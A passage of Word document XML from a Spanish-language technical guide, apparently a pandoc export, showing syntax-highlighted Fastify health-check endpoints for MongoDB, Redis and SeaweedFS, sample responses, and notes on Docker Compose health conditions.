        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/live'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 status</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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Readiness: ¿Puede aceptar tráfico?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/ready'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> reply)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status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> HealthStatus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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checks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MongoDB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dbStart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(mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">readyState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'MongoDB not connected'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mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ ping</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AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mongodb</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responseTime</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dbStart }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (err</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status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mongodb</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message</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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Check Redis</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redisStart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ping</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AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">redis</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responseTime</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redisStart }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (err</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status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">redis</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message</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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Check SeaweedFS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> s3Start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HEAD request al bucket</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SEAWEEDFS_ENDPOINT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/webmail-attachments`</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'HEAD'</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AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">seaweedfs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ok</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404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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responseTime</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s3Start</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status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">seaweedfs</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message</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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    reply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(status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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">503</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Startup probe: ¿La aplicación ha terminado de inicializar?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/startup'</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Verificar que todos los plugins estén cargados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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hasPlugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@fastify/jwt'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'starting'</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status</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Respuestas de health check:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/health/live</w:t>
      </w:r>
      <w:r>
        <w:br/>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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/health/ready</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(todo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">saludable)</w:t>
      </w:r>
      <w:r>
        <w:br/>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"mongodb"</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rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"responseTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"redis"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rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"responseTime"</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"seaweedfs"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rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"responseTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">45</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GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/health/ready</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">caído)</w:t>
      </w:r>
      <w:r>
        <w:br/>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"mongodb"</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rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"responseTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"redis"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"error"</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"ECONNREFUSED"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"seaweedfs"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rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"responseTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">32</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Configuración de Docker Compose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">depends_on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">condition: service_healthy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">asegura que Nginx no redirija tráfico al API hasta que todos los health checks pasen. El</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">start_period: 30s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">permite que el servicio de API tenga tiempo suficiente para inicializar Mongoose, conectarse a Redis y verificar SeaweedFS antes de reportarse como saludable.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1352"/>
        <w:gridCol w:w="1931"/>
        <w:gridCol w:w="2897"/>
        <w:gridCol w:w="1738"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Probe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">¿Qué verifica?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fallo →</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Liveness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/health/live</w:t>
            </w:r>
          </w:p>
        </w:tc>
